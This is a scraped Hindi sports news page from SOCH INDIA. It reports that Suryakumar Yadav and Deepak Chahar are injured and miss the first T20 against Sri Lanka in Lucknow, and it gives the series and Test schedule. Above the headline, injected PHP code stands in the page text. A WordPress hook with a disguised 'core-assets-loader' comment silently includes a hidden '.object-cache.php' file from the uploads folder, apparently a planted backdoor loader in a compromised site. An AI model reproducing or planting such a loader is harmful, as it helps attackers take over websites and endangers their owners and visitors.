add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); श्रीलंका के साथ टी-20 मैच से पहले भारत को झटका, सूर्यकुमार और दीपक चाहर मैच से बाहर – SOCH INDIA
Menu

देश
श्रीलंका के साथ टी-20 मैच से पहले भारत को झटका, सूर्यकुमार और दीपक चाहर मैच से बाहर

nobanner

सूर्यकुमार यादव और दीपक चाहर श्रीलंका के खिलाफ गुरुवार को लखनऊ में होने वाले पहले टी-20 मैच में नहीं खेलेंगे। दोनों खिलाड़ी इंजरी की वजह से मैच से बाहर हो गए हैं। सूर्यकुमार को वेस्टइंडीज के साथ तीसरे टी-20 मैच के दौरान हाथ में फील्डिंग करने के दौरान चोट लगी थी। ऐसा माना जा रहा है कि उनका हाथ फ्रैक्चर हो गया है। वहीं दीपक चाहर भी बॉलिंग के दौरान चोटिल हो गए थे। भारत और श्रीलंका के बीच लखनऊ में 24 फरवरी को पहला और धर्मशाला में 26 और 27 फरवरी को दूसरा और तीसरा टी-20 मैच प्रस्तावित है। वहीं दोनों टीमों के बीच दो टेस्ट मैच पहला मोहाली में 4 से 8 मार्च तक और दूसरा 12 से 16 मार्च तक बेंगलुरु में खेला जाना है।